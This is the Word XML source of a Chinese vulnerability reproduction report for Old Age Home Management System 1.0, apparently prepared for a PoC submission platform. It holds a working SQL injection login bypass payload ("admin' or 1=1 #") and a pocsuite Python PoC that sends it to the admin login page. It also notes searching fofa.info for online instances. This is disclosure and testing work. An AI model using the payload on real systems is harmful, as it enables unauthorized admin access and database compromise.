        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc5023"/>
      <w:bookmarkStart w:id="17" w:name="_Toc7909"/>
      <w:bookmarkStart w:id="18" w:name="_Toc33"/>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341"/>
        <w:tblOverlap w:val="never"/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51"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D00DD" w14:paraId="32EC8B98" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C83C1E2" w14:textId="77777777" w:rsidR="002D00DD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7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B1D95D" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast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:rsidR="002D00DD" w14:paraId="28E1C139" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37B412A5" w14:textId="77777777" w:rsidR="002D00DD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7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="123C2846" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLineChars="200" w:firstLine="480"/>
              <w:jc w:val="lef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在本地下载</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Old Age Home Management System 1.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>的环境（详</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>情主页：</w:t>
            </w:r>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>；下载地址：</w:t>
            </w:r>
            <w:hyperlink r:id="rId10" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>；），需要使用本地</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Apache</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>服务器以及</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>数据库搭建。按照对应的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Read me.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>文件的导引完成初始化操作，实验环境搭建完成。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="3059DEA4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77BE7F98" w14:textId="77777777" w:rsidR="002D00DD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lastRenderedPageBreak/>
              <w:t>漏洞复现</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6231ECE4" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLineChars="200" w:firstLine="480"/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进入管理后台的登录界面（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>http://127.0.0.1/oahms/admin/login.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>），在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栏输入“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 xml:space="preserve"> or 1=1 #</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>”，在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栏输入任意字符点击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按钮，成功进入管理后台，登陆成功，漏洞复现完成。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="5EA1E80C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02BEFE11" w14:textId="77777777" w:rsidR="002D00DD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编写</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74258666" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000"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 xml:space="preserve">   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按照漏洞复现的流程，结合抓包结果和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框架，编写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代码，实现自动漏洞测试验证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="2B1C6D0E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="851"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="045001FC" w14:textId="77777777" w:rsidR="002D00DD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平台提交</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7051" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C68CA10" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="0000000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登录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 xml:space="preserve"> 360 POC++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平台，提交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 w14:paraId="7C907020" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD"/>
    <w:p w14:paraId="4C2A64C0" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc29668"/>
      <w:bookmarkStart w:id="20" w:name="_Toc18669"/>
      <w:bookmarkStart w:id="21" w:name="_Toc1860"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风险等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/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651"/>
        <w:gridCol w:w="5721"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D00DD" w14:paraId="351EE554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1167ED99" w14:textId="77777777" w:rsidR="002D00DD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5B12C3DF" w14:textId="77777777" w:rsidR="002D00DD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79F1322D" w14:textId="77777777" w:rsidR="002D00DD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:rsidR="002D00DD" w14:paraId="614277AF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7D50A074" w14:textId="77777777" w:rsidR="002D00DD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19287349" w14:textId="77777777" w:rsidR="002D00DD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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FDB75C9" w14:textId="77777777" w:rsidR="002D00DD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1"/>
              </w:rPr>
              <w:t>Old Age Home Management System 1.0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>后台管理员的登录界面存在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入漏洞，一旦攻击者得到了后台的路径便可以直接通过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>注入的方式绕过登录机制，进入后台，从而对数据库和服务器产生危害。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="4FE8E99B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4DF66258" w14:textId="77777777" w:rsidR="002D00DD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0027A7C8" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C5C6705" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D00DD" w14:paraId="6E1934D7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3556CFC4" w14:textId="77777777" w:rsidR="002D00DD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651" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E6D7568" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="283E0381" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="580D1929" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD"/>
    <w:p w14:paraId="098B19E2" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD"/>
    <w:p w14:paraId="386C9A5D" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="23" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="24" w:name="_Toc6133"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现过程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4"/>
    </w:p>
    <w:p w14:paraId="396AC285" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>在本地下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Old Age Home Management System 1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的环境后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入管理后台的登录界面（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://127.0.0.1/oahms/admin/login.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栏输入“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or 1=1 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栏输入任意字符点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LOGIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按钮，成功进入管理后台，登陆成功，漏洞复现完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB52EE6" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc18532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风险管理及规避</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="74D50B70" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>严格在本地搭建漏洞环境，必要时可以切掉与外部网络的连接，不要对线上的运营中的网站进行测试，以免造成危害正常运营。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24B862" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc10352"/>
      <w:bookmarkStart w:id="27" w:name="_Toc4033"/>
      <w:bookmarkStart w:id="28" w:name="_Toc23034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17C24246" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本地搭建平台进行漏洞复现，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fofa.info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询在线测试子域名，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指纹平台查询应用指纹，没有找到后提交指纹。通过在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包放包的方式编写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码，并在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pocsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境下测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12753386" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc28030"/>
      <w:bookmarkStart w:id="30" w:name="_Toc75461104"/>
      <w:bookmarkStart w:id="31" w:name="_Toc10303"/>
      <w:bookmarkStart w:id="32" w:name="_Toc28445"/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35466915" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ire</w:t>
      </w:r>
      <w:r>
        <w:t>fox-latest; pocsuite-2.0.8; python 2.7; php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.5.38</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Apache; MySQL 8.0; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kali-linux-2021.1; burp suite professional v1.7.37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693A1674" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D00DD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747C5972" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc11461"/>
      <w:bookmarkStart w:id="34" w:name="_Toc75461114"/>
      <w:bookmarkStart w:id="35" w:name="_Toc19260"/>
      <w:bookmarkStart w:id="36" w:name="_Toc12892"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35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36"/>
    </w:p>
    <w:p w14:paraId="61806D89" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc32666"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.1 POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件编写</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="16F71C2E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#!/usr/bin/env python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2100CA68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# -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3661CC60" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D0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</w:p>
    <w:p w14:paraId="60EA5B7C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from pocsuite.api.request import req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C4915F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from pocsuite.api.poc import register,Output, POCBase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25099D84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from pocsuite.thirdparty.guanxing import  parse_ip_port, http_packet, make_verify_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEC86AC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import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F77DC1" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D0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</w:p>
    <w:p w14:paraId="69A025F5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class TestPOC(POCBase):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD27D5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vulID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224DEB93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cveID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22532E09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cnvdID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C19DB9E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cnnvdID = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370B4020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version = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A7CBB0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author = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513E0464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vulDate = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B47EB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createDate = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2442E92D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updateDate = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F81EEB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name = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC6E05C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desc = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A99EBBD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solution = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF55B9F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severity = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C8B1CF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vulType = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265A443E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taskType = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF8C388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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>references = ['''''']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35721D69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appName = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DF1949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appVersion = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADA050D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appPowerLink = ''''''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69007D31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samples = ['']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CFA6DA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install_requires = ['''''']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0340E22D" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D0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</w:p>
    <w:p w14:paraId="6B3177D1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def _attack(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE71DB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return self._verify()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F2C2BE" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D0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</w:p>
    <w:p w14:paraId="5925A0E1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def _verify(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1399B7E0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self.url,ip,port = parse_ip_port(self.target,80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2FD895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result = {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45947531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headers = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B60A0F4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</w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"Content-Type": "application/x-www-form-urlencoded"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750BADC5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C164597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data = "username=admin' or 1=1 # &amp;password=passwd&amp;submit="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D78A8C4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path = '/oahms/admin/login.php'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EF4B28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vul_url = make_verify_url(self.url, path, mod = 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F232336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resp = req.post(vul_url, headers = headers, data = data, verify = False, allow_redirects = True, timeout = 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520A94D3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if "Old Age Home Management System|| Dashboard" in resp.content and resp.status_code == 200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFC440E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</w:r>
      <w:r>
        <w:tab/>
        <w:t>result['VerifyInfo'] = http_packet(resp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACBD262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</w:r>
      <w:r>
        <w:tab/>
        <w:t>result['VerifyInfo']['URL'] = vul_url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3852D8D6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</w:r>
      <w:r>
        <w:tab/>
        <w:t>result['VerifyInfo']['port'] = port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D555E69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return self.parse_output(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F13C5BA" w14:textId="77777777" w:rsidR="002D00DD" w:rsidRDefault="002D0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</w:p>
    <w:p w14:paraId="24953369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  <w:t>def parse_output(self, result):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE1F786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#parse output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E181E2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output = Output(self)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B408966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if result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E40723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</w:r>
      <w:r>
        <w:tab/>
        <w:t>output.success(result)</w:t>
      </w:r>
    </w:p>
